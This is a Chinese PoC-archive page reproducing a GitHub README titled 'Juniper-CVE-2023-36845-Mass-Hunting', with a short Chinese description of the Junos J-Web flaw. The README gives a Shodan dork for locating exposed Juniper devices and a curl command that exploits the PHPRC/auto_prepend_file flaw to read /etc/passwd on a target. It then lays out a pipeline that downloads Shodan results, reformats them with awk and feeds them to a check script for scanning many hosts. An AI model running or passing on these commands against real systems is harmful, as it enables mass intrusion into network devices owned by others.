POC详情: 334b283944e49c4d868c4a00bcd3dca34cbef154

来源
https://github.com/jahithoque/Juniper-CVE-2023-36845-Mass-Hunting
关联漏洞
标题: Juniper Networks Junos OS EX 安全漏洞 (CVE-2023-36845)
描述:Juniper Networks Junos OS EX是美国瞻博网络(Juniper Networks)公司的一套专用于该公司的硬件设备的网络操作系统。该操作系统提供了安全编程接口和Junos SDK。 Juniper Networks Junos OS EX存在安全漏洞,该漏洞源于J-Web模块存在PHP外部变量修改漏洞。
描述
Juniper RCE (Remote Code Execution) CVE-2023-36845 is a vulnerability that has been identified within Juniper's software. This particular flaw allows for remote code execution, meaning an attacker could run arbitrary code on a system without needing physical access to the device.
介绍
# Juniper-CVE-2023-36845-Mass-Hunting
Juniper RCE (Remote Code Execution) CVE-2023-36845 is a vulnerability that has been identified within Juniper's software. This particular flaw allows for remote code execution, meaning an attacker could run arbitrary code on a system without needing physical access to the device.

## How to find:

Shodan dork: http.favicon.hash:2141724739

use with relevant other dorks such as ssl certs, org name, etc for a more targetted search.


## Exploitation for a single host:

curl -k https://$IP/about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"’

## Automation: 
└─# shodan download Juniper 'http.favicon.hash:2141724739 ssl:domain.com’ #download from shodan

└─# shodan parse Juniper.json.gz --fields ip_str,port >unfiltered_IP_Ports.txt

└─# awk '{print $1":"$2}' unfiltered_IP_Ports.txt >juniper-final.txt

└─# ./Juniper-RCE-check.sh -f juniper-final.txt
![IMAGE](imageedit_1_8650806956.jpg)
文件快照

 [4.0K]  /data/pocs/334b283944e49c4d868c4a00bcd3dca34cbef154
├── [105K]  imageedit_1_8650806956.jpg
├── [1.4K]  Juniper-RCE-Check.sh
├── [6.9K]  LICENSE
└── [ 974]  README.md

0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。